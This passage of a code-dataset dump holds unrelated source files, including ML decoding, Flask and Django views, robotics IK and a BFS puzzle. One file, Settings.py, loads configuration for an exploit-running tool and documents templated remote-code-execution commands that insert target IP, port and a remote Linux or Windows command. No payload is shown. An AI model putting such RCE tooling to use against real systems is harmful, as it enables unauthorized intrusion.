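def merkle_root(leaves):
    level = [hash256(item) for item in leaves]  # hash the bottom level
    while len(level) > 1:
        if len(level) % 2:            # odd count: duplicate the last node
            level.append(level[-1])
        level = [hash256(level[i] + level[i + 1])
                 for i in range(0, len(level), 2)]
    return level[0]

print(merkle_root([b"tx1", b"tx2", b"tx3"]).hex())
```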
vizer.fit_transform(f).astype(float)\n# # for i in sorted([(key,val) for (key, val) in vizer.vocabulary_.items()]):\n# # print(i)\n#\n# frequency_matrix = sorted([(key,val) for (key, val) in vizer.vocabulary_.items()], key=lambda x,y:x)\n# for i in frequency_matrix:\n# print(i[0])\n# stemmer_porter = PorterStemmer()\n# # tokens_stemporter = [''.join(list(map(stemmer_porter.stem, sent[0]))) for sent in frequency_matrix]\n# # for i in tokens_stemporter:\n# # print(i)\n\nimport numpy as np\nfrom sklearn.feature_extraction.text import TfidfVectorizer\n\n\ndef main():\n # Some code was used from https://gist.github.com/StevenMaude/ea46edc315b0f94d03b9\n vectorizer = TfidfVectorizer(input='content', max_features=200,\n token_pattern='(?u)\\\\b[a-zA-Z]\\\\w{2,}\\\\b',\n stop_words='english', ngram_range=(1, 3))\n with open('../data/test/raw.txt') as f:\n vect = vectorizer.fit_transform(f)\n\n scores = zip(vectorizer.get_feature_names(),\n np.asarray(vect.sum(axis=0)).ravel())\n sorted_scores = sorted(scores, key=lambda x: x[1], reverse=True)\n for item in sorted_scores:\n print(item)\n\n\n\n\nif __name__ == '__main__':\n\n main()\n","sub_path":"src/vectorize.py","file_name":"vectorize.py","file_ext":"py","file_size_in_byte":1582,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"90020267","text":"'''\nImplementations of CTC decoding for PoreOver\n\nThis version does not collapse repeated characters so is only valid if the model\nhas been trained with ctc_merge_repeated=False.\n'''\n\nimport numpy as np\nimport operator\nfrom collections import OrderedDict\n\n# Default alphabet\nDNA_alphabet = OrderedDict([('A',0),('C',1),('G',2),('T',3)])\n\ndef remove_gaps(a):\n # only needed for greedy decoding\n # unlike standard CTC, does not remove repeated characters\n label = ''\n for i in a:\n if i != '-':\n label += i\n return(label)\n\ndef greedy_search(logits, alphabet=['A','C','G','T','-']):\n # take highest probability label at each step\n argmax_ = np.argmax(logits, axis=1)\n chars_ = np.take(alphabet, argmax_)\n return(remove_gaps(chars_))\n\ndef forward(l,y):\n t_max = len(y)\n s_max = len(l)\n\n # fw[t][s] is forward probability of the labeling_{1:s} at time t\n fw = np.zeros((t_max,s_max))\n\n # fw[-1,-1] = 1 and fw[-1, *] = 0 fw[*,-1] = product of gap probabilites\n for t in range(t_max):\n for s in range(s_max):\n if t==0 and s==0:\n fw[t,s] = y[t,l[s]]\n elif t==0 and s>0:\n fw[t,s] = 0\n elif s==0:\n fw[t,s] = y[t,-1]*fw[t-1,s] + y[t,l[s]]*np.product(y[:t,-1])\n else:\n fw[t,s] = y[t,-1]*fw[t-1,s] + y[t,l[s]]*fw[t-1,s-1]\n\n return(fw)\n\n\n# return augmented forward matrix with extra column\ndef forward_add_column(fw, y, l):\n #print('Adding column for label',l,fw)\n t_max = len(y)\n s_max = len(l)\n\n fw_ = np.zeros((t_max,s_max))\n fw_[:,:-1] = fw\n\n s = s_max - 1\n for t in range(t_max):\n if t==0 and s==0:\n fw_[t,s] = y[t,l[s]]\n elif t==0 and s>0:\n fw_[t,s] = 0\n elif s==0:\n fw_[t,s] = y[t,-1]*fw_[t-1,s] + y[t,l[s]]*np.product(y[:t,-1])\n else:\n fw_[t,s] = y[t,-1]*fw_[t-1,s] + y[t,l[s]]*fw_[t-1,s-1]\n return(fw_)\n\n# return prefix probability from the forward matrix\ndef forward_prefix_prob(fw,y,k):\n if len(k) > 1:\n prefix_prob_ = 0\n for t in range(len(y)):\n if t==0:\n prefix_prob_ += 0\n else:\n prefix_prob_ += y[t,k[-1]]*fw[t-1,-2]\n else:\n prefix_prob_ = np.sum([y[t,k[-1]]*np.product(y[:t,-1]) for t in range(len(y))])\n return(prefix_prob_)\n\ndef prefix_search(y, 
alphabet=OrderedDict([('A',0),('C',1),('G',2),('T',3)]),return_forward=False, return_search=False):\n # y: np array of softmax probabilities\n # alphabet: ordered dict of label to index\n\n stop_search = False\n search_level = 0\n\n gap_prob = np.product(y[:,-1])\n label_prob = {'':gap_prob}\n\n top_label = ''\n top_label_prob = 0\n top_label_fw = np.array([])\n\n curr_label = ''\n curr_label_fw = np.array([])\n\n search_intermediates = []\n\n while not stop_search:\n #print('Level:',search_level, 'Top Hit:',top_label, 'Label Probability:',label_prob[top_label])\n #print('Current Label:',curr_label)\n\n prefix_prob = {}\n prefix_fw = []\n\n for c in alphabet:\n prefix = curr_label + c\n prefix_int = [alphabet[i] for i in prefix]\n\n if search_level == 0:\n prefix_fw.append(forward(prefix_int,y))\n else:\n prefix_fw.append(forward_add_column(curr_label_fw, y, prefix_int))\n\n label_prob[prefix] = prefix_fw[-1][-1,-1]\n if label_prob[prefix] > top_label_prob:\n top_label = prefix\n top_label_prob = label_prob[prefix]\n top_label_fw = prefix_fw[-1]\n\n prefix_prob[prefix] = forward_prefix_prob(prefix_fw[-1], y, prefix_int)\n #print('extending by prefix:',c, 'Prefix Probability:',prefix_prob[prefix], 'Label probability:',label_prob[prefix])\n\n # get best prefix probability\n best_prefix = max(prefix_prob.items(), key=operator.itemgetter(1))[0]\n\n search_intermediates.append([ (p,prefix_prob[p],label_prob[p]) for p in sorted(prefix_prob.keys())])\n\n if prefix_prob[best_prefix] < top_label_prob:\n stop_search = True\n else:\n # get highest probability label\n #top_label = max(label_prob.items(), key=operator.itemgetter(1))[0]\n # top_label should be set each iteration, along with top_fw\n\n # move to prefix with highest label probability\n curr_label = max(prefix_prob.items(), key=operator.itemgetter(1))[0]\n curr_label_fw = prefix_fw[alphabet[curr_label[-1]]]\n\n search_level += 1\n\n #print(\"Search finished! 
Top label is\",top_label, label_prob[top_label])\n if return_forward:\n if return_search:\n return(top_label, top_label_fw, search_intermediates)\n else:\n return(top_label, top_label_fw)\n else:\n return(top_label, label_prob[top_label])\n","sub_path":"decoding/archive/ctc.py","file_name":"ctc.py","file_ext":"py","file_size_in_byte":4922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"302417079","text":"from app import app, support\nfrom flask import render_template, flash, redirect, url_for\nfrom app.forms import LoginForm\nfrom app.models import User, Post\n\nfrom flask_login import current_user, login_user, logout_user\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n posts = Post.get(is_active=True, limit=5)\n for post in posts:\n post.body = support.first_paragraph(post.body)\n return render_template('index.html', posts=posts)\n\n\n@app.route('/mypanel', methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('index'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.get_first(username=form.username.data)\n if user is None or not user.check_password(form.password.data):\n flash('Неверный логин или пароль', 'alert')\n return redirect(url_for('login'))\n login_user(user, remember=form.remember_me.data)\n flash('Вход выполнен успешно', 'success')\n return redirect(url_for('index'))\n return render_template('login.html', form=form)\n\n\n@app.route('/logout')\ndef logout():\n if current_user.is_authenticated and logout_user():\n flash('Выход выполнен успешно', 'success')\n return redirect(url_for('index'))\n\n","sub_path":"app/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"185527397","text":"import json\n\nfrom django.http import JsonResponse\n\nfrom contest.auth import admin_required\nfrom contest.models.contest import Contest\nfrom contest.models.problem import Problem\n\n\n@admin_required\ndef deleteContest(request, *args, **kwargs):\n id = request.POST['id']\n Contest.get(id).delete()\n return JsonResponse(\"ok\", safe=False)\n\n\n@admin_required\ndef createContest(request):\n \"\"\"POSTing a freshly-created contest redirects here courtesy of script.js.\"\"\"\n id = request.POST.get(\"id\")\n contest = Contest.get(id) or Contest()\n\n contest.name = request.POST.get(\"name\")\n contest.start = int(request.POST.get(\"start\"))\n contest.end = int(request.POST.get(\"end\"))\n contest.scoreboardOff = int(request.POST.get(\"scoreboardOff\"))\n contest.showProblInfoBlocks = request.POST.get(\"showProblInfoBlocks\")\n contest.problems = [Problem.get(id) for id in json.loads(request.POST.get(\"problems\"))]\n if str(request.POST.get(\"tieBreaker\")).lower() == \"true\":\n contest.tieBreaker = True\n else:\n contest.tieBreaker = False\n\n # True if \"displayFullname\" == \"true\"\n contest.displayFullname = str(request.POST.get(\"displayFullname\")).lower() == \"true\"\n \n\n contest.save()\n\n return JsonResponse(contest.id, safe=False)\n","sub_path":"opencontest/contest/views/contests.py","file_name":"contests.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"106405046","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nEd Mountjoy (June 2018)\n\nFormats the output of bedtools into final format for loading\n'''\n\nimport 
argparse\nimport pandas as pd\nimport sys\n\n\ndef main():\n\n # Parse args\n args = parse_args()\n\n # Load data\n data = pd.read_csv(args.inf, sep='\\t', header=0)\n\n # Split variant ID into parts\n var_split = data['variant_id'].str.split('_', expand=True)\n var_split.columns = ['chrom', 'pos', 'other_allele', 'effect_allele', 'build']\n\n # Join\n data = pd.concat([var_split, data], axis=1)\n data['chrom'] = data['chrom'].astype(str)\n data['pos'] = data['pos'].astype(int)\n\n # Fix gene_ids\n data['gene_id'] = data['gene_id'].apply(lambda gene: gene.split('.')[0])\n\n # Replace chrom X for 23\n # data = data.replace(to_replace={'chrom':{'X': '23'}})\n\n # Select required columns\n data = data.rename(columns={\n 'slope': 'beta',\n 'slope_se': 'se',\n 'gene_id': 'ensembl_id',\n 'pval_nominal': 'pval'})\n data = data.loc[:, ['chrom','pos', 'other_allele', 'effect_allele',\n 'ensembl_id', 'beta', 'se', 'pval']]\n data = data.sort_values(['chrom', 'pos'])\n\n data.to_csv(args.outf, sep='\\t', index=None, compression='gzip')\n\n return 0\n\ndef parse_args():\n \"\"\" Load command line args \"\"\"\n parser = argparse.ArgumentParser()\n parser.add_argument('--inf', metavar=\"\", help=('Input file'), type=str, required=True)\n parser.add_argument('--outf', metavar=\"\", help=(\"Output file\"), type=str, required=True)\n args = parser.parse_args()\n return args\n\nif __name__ == '__main__':\n\n main()\n","sub_path":"scripts/gtex7_format_cisreg.py","file_name":"gtex7_format_cisreg.py","file_ext":"py","file_size_in_byte":1650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"376263445","text":"'''\nConfiguration\n'''\n\n__author__ = 'Linjun'\n\nimport config.config_default\n\nfrom collections import Mapping\n\nclass Config(dict):\n '''\n Simple setting support access as x.y style.\n '''\n\n def __init__(self, configs):\n super(Config, self).__init__(**configs)\n for k, v in configs.items():\n self[k] = Config(v) if isinstance(v, Mapping) else v\n\n def __getattr__(self, key):\n try:\n return self[key]\n except KeyError:\n raise AttributeError(r\"'Setting' has not attribute '%s'\" % key)\n \n def __setattr__(self, key, value):\n self[key] = value\n\n def merge(self, u):\n for k, v in u.items():\n if isinstance(v, Mapping):\n self.get(k).merge(v)\n else:\n self[k] = v\n\n\ntry:\n configs = Config(config_default.configs)\n import config.config_override\n configs.merge(config_override.configs)\nexcept ImportError as e:\n pass","sub_path":"www/config/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":962,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"578202263","text":"# controller for querying alpha vantage api\nimport requests\nfrom project import app\nimport pdb\n\n\nalpha_v_base = 'https://www.alphavantage.co/query'\n\ndef get(request, stock_symbol):\n payload = {\n 'function': 'TIME_SERIES_INTRADAY',\n 'symbol': stock_symbol,\n 'interval': request.args.get('interval', '') or '1min',\n 'outputsize': 'compact',\n 'datatype': 'json',\n 'apikey': app.config['ALPHA_V_KEY']\n }\n req = requests.get(alpha_v_base, params=payload)\n return req.text\n","sub_path":"server/project/controllers/stocks.py","file_name":"stocks.py","file_ext":"py","file_size_in_byte":521,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"388728941","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n###\n### Core > Settings 
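The `Config` class in the configuration record above gives nested dicts `x.y` attribute access and a recursive `merge`. One caveat in that record: `import config.config_default` binds the name `config`, so the bare `config_default` referenced two lines later only resolves if the module is imported as `from config import config_default`. A self-contained sketch of the same idea (importing `Mapping` from `collections.abc`, since the bare `collections` alias is gone in Python 3.10+):

```python
from collections.abc import Mapping

class Config(dict):
    """Dict with x.y attribute access and a recursive merge."""
    def __init__(self, configs):
        super().__init__(**configs)
        for k, v in configs.items():
            self[k] = Config(v) if isinstance(v, Mapping) else v

    def __getattr__(self, key):
        try:
            return self[key]
        except KeyError:
            raise AttributeError(key)

    def merge(self, other):
        for k, v in other.items():
            if isinstance(v, Mapping):
                self[k].merge(v)      # recurse into nested sections
            else:
                self[k] = v

defaults = Config({'db': {'host': 'localhost', 'port': 3306}})
defaults.merge({'db': {'host': 'db.example.com'}})
print(defaults.db.host, defaults.db.port)   # db.example.com 3306
```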
\n###\n\"\"\"\n\nexploits.conf:\n-------------\nFor each exploit:\n[exploit_name]\ntype = rce-blind | rce-standard\ncommand = Command to run the exploit, with tags\nsuccess = String matching success (optional)\n\nSupported Tags for command:\n---------------------------\n[IP] : Target IP\n[PORT] : Target Port\n[SSL true=\"value\"] : Replaced by \"value\" if SSL/TLS\n[LOCALIP] : Local IP\n[CMD] : Location for command to execute on remote system\n Command will be repeated to try to execute Linux\n command once, and then Windows command (assume, \n target OS is not known)\n[CMDLINUX] : Location for Linux command to execute\n[CMDWINDOWS] : Location for Windows command to execute\n\"\"\"\nimport os\nimport traceback\nimport configparser\nfrom datetime import datetime\nfrom collections import defaultdict\n\nfrom lib.core.Config import *\nfrom lib.core.Exploit import Exploit\nfrom lib.core.Exceptions import SettingsException\nfrom lib.utils.DefaultConfigParser import DefaultConfigParser\nfrom lib.utils.OutputUtils import OutputUtils\n\n\nclass Settings:\n\n def __init__(self):\n \"\"\"\n Start the parsing of settings files and create the Settings object.\n\n :raises SettingsException: Exception raised if any error is encountered while \n parsing files\n \"\"\"\n self.exploits = list()\n\n # Check presence of exploits.conf files\n if not os.access(EXPLOITS_CONF, os.F_OK):\n raise SettingsException('Missing configuration file exploits.conf')\n\n # Parse configuration file\n self.__parse_conf_file()\n \n\n #------------------------------------------------------------------------------------\n\n def __parse_conf_file(self):\n parser = DefaultConfigParser()\n # Utf-8 to avoid encoding issues\n parser.read(EXPLOITS_CONF, 'utf8')\n\n for section in parser.sections():\n type_ = parser.safe_get(section, 'type', '', None)\n if type_ not in SUPPORTED_TYPES:\n raise SettingsException('Unsupported exploit type for [{}]'.format(type_))\n\n rawcmd = parser.safe_get(section, 'command', '', None)\n if not rawcmd:\n raise SettingsException('No command specified for [{}]'.format(rawcmd))\n\n description = parser.safe_get(section, 'description', '', None)\n success = parser.safe_get(section, 'success', '', None)\n\n exploit = Exploit(section, description, type_, rawcmd, success)\n self.exploits.append(exploit)\n\n\n def get_exploit(self, name):\n for xpl in self.exploits:\n if name.lower() == xpl.name.lower():\n return xpl\n return None\n\n\n def show_list_exploits(self):\n data = list()\n columns = [\n 'Name',\n 'Description',\n 'Type',\n ]\n\n for xpl in self.exploits:\n data.append([\n xpl.name,\n xpl.description,\n xpl.type,\n ]) \n\n OutputUtils.table(columns, data, hrules=False)\n\n\n","sub_path":"lib/core/Settings.py","file_name":"Settings.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"8064012","text":"from flask import render_template, session, redirect, url_for, jsonify\nfrom flask import request\n\nfrom app import Comments\nfrom app import Family\nfrom app.extensions.database import db\nfrom . 
import main\n\n\n@main.route('/', methods=['GET', 'POST'])\ndef index():\n return render_template('index.html', name='123')\n\n\n@main.route('/plan', methods=['GET', 'POST'])\ndef plan():\n # family = Family(name='张瑞宇', description='爱爱的到底是啥', relation='铲屎少年')\n # db.session.add(family)\n # db.session.commit()\n # Family.getAllMembers()\n return render_template('plan.html', name='123')\n\n\n@main.route('/about', methods=['GET', 'POST'])\ndef about():\n members = Family.getAllMembers()\n return render_template('about.html', members=members)\n\n\n@main.route('/message_board', methods=['GET', 'POST'])\ndef message_board():\n comments = Comments.getComments(0)\n return render_template('comments.html', comments=comments)\n\n\n@main.route('/addFamily', methods=['GET', 'POST'])\ndef addFamily():\n try:\n name = request.form['name']\n nick_name = request.form['nick_name']\n description = request.form['description']\n relation = request.form['relation']\n family = Family(name=name, nickname=nick_name, description=description, relation=relation)\n db.session.add(family)\n db.session.commit()\n except:\n return jsonify({'code': 100})\n return jsonify({'code': 200})\n\n\n@main.route('/comment', methods=['GET', 'POST'])\ndef addcomment():\n try:\n name = request.form['name']\n description = request.form['description']\n family = Comments(name=name, description=description)\n db.session.add(family)\n db.session.commit()\n except:\n return jsonify({'code': 100})\n return jsonify({'code': 200})\n","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"652855644","text":"import numpy as np\nfrom mujoco_py import functions as mj_fns\n\n\ndef get_jacobian(model, data, bodyid):\n pos = np.zeros((3, model.nv))\n rot = np.zeros((3, model.nv))\n mj_fns.mj_kinematics(model, data)\n mj_fns.mj_comPos(model, data)\n mj_fns.mj_jacBody(model, data, pos.reshape(-1), rot.reshape(-1), bodyid)\n return np.concatenate((pos, rot))\n\n\ndef solve_qp_ik_vel(vel, jac, joint_pos, joint_lims=None, duration=None, margin=0.2, solver=None):\n \"\"\"\n Solves the IK for a given pusher velocity using a QP solver, imposing joint limits.\n If the solution is optimal, it is guaranteed that the resulting joint velocities will not\n cause the joints to reach their limits (minus the margin) in the specified duration of time\n :param vel: desired EE velocity\n :param jac: jacobian\n :param joint_pos: current joint positions\n :param joint_lims: matrix of joint limits; if None, limits are not imposed\n :param duration: how long the specified velocity will be kept (in seconds); if None, 2.0 is used\n :param margin: maximum absolute distance to be kept from the joint limits\n :param solver: the name of the solver to be used\n :return: tuple with the solution (as a numpy array) and with a boolean indincating if the result is optimal or not\n :type vel: np.ndarray\n :type jac: np.ndarray\n :type joint_pos: np.ndarray\n :type joint_lims: np.ndarray\n :type duration: float\n :type margin: float\n :type solver: str\n :rtype: (np.ndarray, bool)\n \"\"\"\n\n import cvxopt\n x_len = len(joint_pos)\n\n P = cvxopt.matrix(np.identity(x_len))\n A = cvxopt.matrix(jac)\n b = cvxopt.matrix(vel)\n q = cvxopt.matrix(np.zeros(x_len))\n\n if duration is None:\n duration = 2.\n\n if joint_lims is None:\n G, h = None, None\n else:\n G = duration * np.identity(x_len)\n h = np.zeros(x_len)\n for i in range(x_len):\n dist_up 
= abs(joint_lims[i, 1] - joint_pos[i])\n dist_lo = abs(joint_lims[i, 0] - joint_pos[i])\n if dist_up > dist_lo:\n # we are closer to the lower limit\n # => must bound negative angular velocity, i.e. G_ii < 0\n h[i] = dist_lo\n G[i, i] *= -1\n else:\n # we are closer to the upper limit\n # => must bound positive angular velocity, i.e. G_ii > 0\n h[i] = dist_up\n h = cvxopt.matrix(h - margin)\n G = cvxopt.matrix(G)\n\n if solver is None:\n qp_kwargs = dict(options=dict(show_progress=False))\n elif solver == 'ldl':\n qp_kwargs = dict(options=dict(show_progress=False, kktreg=1e-9), kktsolver='ldl')\n elif solver == 'mosek':\n import mosek\n qp_kwargs = dict(options=dict(show_progress=False, mosek={mosek.iparam.log: 0}), solver='mosek')\n else:\n raise NotImplementedError\n\n sol = cvxopt.solvers.qp(P, q, A=A, b=b, G=G, h=h, **qp_kwargs)\n\n x = np.array(sol['x']).reshape(-1)\n optimal = sol['status'] == 'optimal'\n\n return x, optimal\n","sub_path":"gym/utils/kinematics.py","file_name":"kinematics.py","file_ext":"py","file_size_in_byte":3051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"49304363","text":"import requests # взаимодействие с сетью\nimport os\n\nurl = 'https://geekbrains.ru/'\n\n#response = requests.get(url)\n#print(response.text)\n\n#os.mkdir('test_mkdir')\n#os.rmdir('test_mkdir')\n\nprint(os.listdir())\nprint(os.path.isdir('.gitignore')) # папка или нет\n\nif __name__ == '__main__':\n pass\n\nprint(__name__)\n\ndef get_htm():\n url='https://geekbrains.ru/'\n response =requests.get(url)\n return response.text\n\n\ndef get_image(url):\n response = requests.get(url)\n return response.content\n\ndef save_image(file_path, image_bytes):\n with open(file_path, 'wb') as file:\n file.write(image_bytes)\n\n\ndef save_html_to_file(file_path, htm_text):\n with open(file_path, 'w', encoding='UTF-8') as file:\n file.write(html_text)\n\n\nif __name__ == '__main__':\n img_url = 'https://arsenal-info.ru/img/1198779448/img_1.jpg'\n file_name = 'temp_gb_main.html'\n file_folder = os.path.dirname(__file__)\n file_path = os.path.join(file_folder, file_name)\n image_path = os.path.join(file_folder, 'img_1.jpg')\n html_text = get_htm()\n #save_html_to_file(file_path,html_text)\n\n img_bytes = get_image(img_url)\n save_image(image_path, img_bytes)\n\n","sub_path":"les5.py","file_name":"les5.py","file_ext":"py","file_size_in_byte":1205,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"586349575","text":"from slacker import Slacker\n# from slack import WebClient\n# from slack.errors import SlackApiError\nimport os\n\nSLACK_TOKEN = os.environ.get('SLACK_TOKEN')\n\n\ndef slack_notify(text=None, channel='#5_db_crawler', attachments=None):\n token = SLACK_TOKEN\n slack = Slacker(token)\n slack.chat.post_message(channel=channel, text=text, attachments=attachments)\n\n\n# def slack_upload_file(file_path):\n# client = WebClient(token=os.environ['SLACK_TOKEN'])\n# try:\n# response = client.files_upload(\n# channels='#5_db_crawler',\n# file=file_path)\n# assert response[\"file\"] # the uploaded file\n# except SlackApiError as e:\n# # You will get a SlackApiError if \"ok\" is False\n# assert e.response[\"ok\"] is False\n# assert e.response[\"error\"] # str like 'invalid_auth', 'channel_not_found'\n# print(f\"Got an error: {e.response['error']}\")\n\n\nif __name__ == '__main__':\n slack_notify('new order created', 
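`solve_qp_ik_vel` in the kinematics record above minimizes the joint-speed norm subject to `jac @ qdot = vel` plus joint-limit inequalities. With no limit rows (the `G`, `h` arguments omitted), the optimum is the minimum-norm solution given by the Moore-Penrose pseudoinverse; a numpy-only sketch with a made-up Jacobian:

```python
import numpy as np

# Hypothetical 6x7 task Jacobian and desired end-effector twist.
rng = np.random.default_rng(0)
jac = rng.standard_normal((6, 7))
vel = np.array([0.1, 0.0, -0.05, 0.0, 0.0, 0.02])

# Without joint-limit rows the QP in the record reduces to the
# minimum-norm least-squares solution, i.e. the pseudoinverse.
qdot = np.linalg.pinv(jac) @ vel

print(np.allclose(jac @ qdot, vel))  # True: the task velocity is met exactly
```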
channel='#7_order')\n","sub_path":"app/utils/slack.py","file_name":"slack.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} {"seq_id":"106892897","text":"\"\"\"\n16236 Baby Shark\n\nA baby shark moves around the grid eating fish.\nIt can only eat fish that are smaller than itself.\nIt moves one cell up/down/left/right per second.\nIt cannot pass a cell holding a fish bigger than itself.\nIt does pass cells holding fish of the same size.\n\nStop when there is no fish left that it can eat.\nIf there are edible fish:\n    exactly one -> eat it\n    several -> compare\n        eat the closest fish\n        on a tie\n            the topmost fish\n            on a tie\n                the leftmost fish\nA shark of size 2 grows to size 3 after eating 2 fish (it grows after eating as many fish as its size).\n\n2 <= N <= 20\n0 empty cell\n1-6 fish\n9 baby shark\n\nAlgorithm: BFS\n\n1. Store the fish sizes and positions, sorted by size\n2. Repeat:\n    1. Find the closest edible fish from the current position and record the distance\n    2. Move there and add the travel time\n    3. Remove the fish\n    4. Update the number of fish eaten\n        1. Grow when the shark has eaten as many fish as its size\n\"\"\"\nfrom collections import deque\nimport sys\nread = sys.stdin.readline\n\nn = int(read().strip())\n\nfishes = []\narea = []\nfor a in range(n):\n    area.append(list(map(int, read().strip().split())))\n    for b, v in enumerate(area[a]):\n        if v == 9:\n            baby_shark = [2, a, b, 0]\n            area[a][b] = 0\n\n\ndxy = [(1, 0), (-1, 0), (0, 1), (0, -1)]\n\n\ndef find_fish():\n    age, sx, sy, _ = baby_shark\n    visit = {(sx, sy): True}\n    q = deque([(sx, sy)])\n\n    fishes_tmp = []\n    d = 1\n    while q:\n        qsize = len(q)\n        for _ in range(qsize):\n            x, y = q.popleft()\n\n            for dx, dy in dxy:\n                nx, ny = x+dx, y+dy\n                if not (0 <= nx < n and 0 <= ny < n):\n                    continue\n                if (nx, ny) in visit:\n                    continue\n                fish_age = area[nx][ny]\n                if fish_age <= age:\n                    q.append((nx, ny))\n                    visit[(nx, ny)] = True\n                if 0 < fish_age < age and (d, nx, ny) not in fishes_tmp:\n                    fishes_tmp.append((d, nx, ny))\n        d += 1\n\n    if fishes_tmp:\n        fishes_tmp = sorted(fishes_tmp)\n        d, x, y = fishes_tmp[0]\n        result = (area[x][y], x, y)\n        return d, result\n\n    return 0, 0\n\n\ndef grow():\n    if baby_shark[0] == baby_shark[3]:\n        baby_shark[0] += 1\n        baby_shark[3] = 0\n\n\ntime = 0\n\nwhile True:\n    distance, fish = find_fish()\n    if distance == 0:\n        break\n\n    baby_shark = [baby_shark[0], fish[1], fish[2], baby_shark[3]+1]\n\n    grow()\n\n    time += distance\n\n    area[fish[1]][fish[2]] = 0\n\n\nprint(time)","sub_path":"code/16236_baby_shark.py","file_name":"16236_baby_shark.py","file_ext":"py","file_size_in_byte":2747,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} {"seq_id":"404696287","text":"import re\nfrom functools import reduce\n\n\ndef standardize_column_name(column_name, table_name):\n\n    if column_name.lower() in ['date', '']:\n        return '\"DATE\"'\n\n    new_column_name = column_name.replace(' ', '_')\n    new_column_name = re.sub('[^0-9a-zA-Z_]+', '', new_column_name)\n\n    first_digit_finder = re.search('\\d', new_column_name)\n    if new_column_name[0:2] in ['M1', 'M2']:\n        new_column_name = new_column_name[2:]\n\n    elif first_digit_finder is not None:\n        new_column_name = new_column_name[first_digit_finder.start():]\n    else:\n        print(\"Couldn't format {}, continuing...\".format(column_name))\n        return None\n\n    if new_column_name[0] in ['0', '1']:\n        new_column_name = '20' + new_column_name\n    else:\n        new_column_name = '19' + new_column_name\n    \n    first_non_digit_finder = re.search('\\D', new_column_name)\n    if first_non_digit_finder is not None:\n        year = new_column_name[:first_non_digit_finder.start()]\n        suffix = new_column_name[first_non_digit_finder.start():]\n        prefix = suffix[0].lower()\n\n        if prefix == 'm':\n            if len(suffix) == 3:\n                suffix = suffix[1:] + '01'\n            elif len(suffix) == 2:\n                suffix = '0' + suffix[1:] + '01'\n            else:\n                print(\"Couldn't format {}, continuing...\".format(column_name))\n                return 
None\n\n elif prefix == 'q':\n if suffix[1:] == '1':\n suffix = '0101'\n elif suffix[1:] == '2':\n suffix = '0401'\n elif suffix[1:] == '3':\n suffix = '0701'\n elif suffix[1:] == '4':\n suffix = '1001'\n else:\n print(\"Couldn't format {}, continuing...\".format(column_name))\n return None\n\n else:\n print(\"Couldn't format {}, continuing...\".format(column_name))\n return None\n\n return prefix + year + suffix\n\n return column_name\n\n\ndef standardize_value(value):\n\n if value is None or value == '#N/A':\n return 'NULL'\n\n if ':' in value:\n year = value[:4]\n\n if 'q' in value.lower():\n if value[-1] == '1':\n date_n_month = '0101'\n elif value[-1] == '2':\n date_n_month = '0401'\n elif value[-1] == '3':\n date_n_month = '0701'\n elif value[-1] == '4':\n date_n_month = '1001'\n else:\n print('Could not parse value: {}'.format(value))\n return 'NULL'\n\n else:\n date_n_month = value[-2:] + '01'\n\n value = \"'\" + year + date_n_month + \"'::DATE\"\n\n elif re.search('[a-zA-Z]', value):\n value = \"'\" + value + \"'\"\n \n return value\n\n\ndef monthly_or_quarterly(row):\n for key, value in row.items():\n stripped_key = re.sub('[^a-z]+', '', key.lower())\n if len(stripped_key) > 0:\n if stripped_key[-1] == 'm':\n return 'monthly'\n if stripped_key[-1] == 'q':\n return 'quarterly'\n\n return 'unknown'\n\n\ndef string_list(actual_list):\n return reduce(\n lambda string_list, value: string_list + str(value) + \", \",\n actual_list,\n ''\n )[0:-2]\n\n","sub_path":"data_parsing/clean_data.py","file_name":"clean_data.py","file_ext":"py","file_size_in_byte":3281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"538599214","text":"import os\nimport json\nfrom django.conf import settings as djangoSettings\nfrom .models import oper_para\nimport logging\n\n\n#fileroute = djangoSettings.STATIC_ROOT + '\\\\'\n#fileroute = 'D:\\\\virenv\\\\bot_static' + '\\\\'\nfileroute = djangoSettings.FILE_ROUTE\n\n#prefilename = 'bot\\linemsg_'\nprefilename = djangoSettings.PREFILENAME\n\n\ndef GetTimeStamp():\n from datetime import datetime\n import calendar\n m = calendar.timegm(datetime.now().timetuple())\n return m\n\ndef ReadFromStaticBOT(mid):\n import json\n import sys\n sys.setdefaultencoding='utf8'\n\n filename = prefilename + mid\n filepath = fileroute + filename\n with open(filepath) as json_data:\n d = json.load(json_data)\n return json.dumps(d)\n\ndef WriteToStaticBOT(msgstr='',way=''):\n from datetime import datetime\n import calendar\n #import sys\n #sys.setdefaultencoding='utf8'\n msgjson = json.loads(msgstr)\n\n mid = mid = msgjson['events'][0]['source']['userId']\n mtext = msgjson['events'][0]['message']['text']\n \n filename 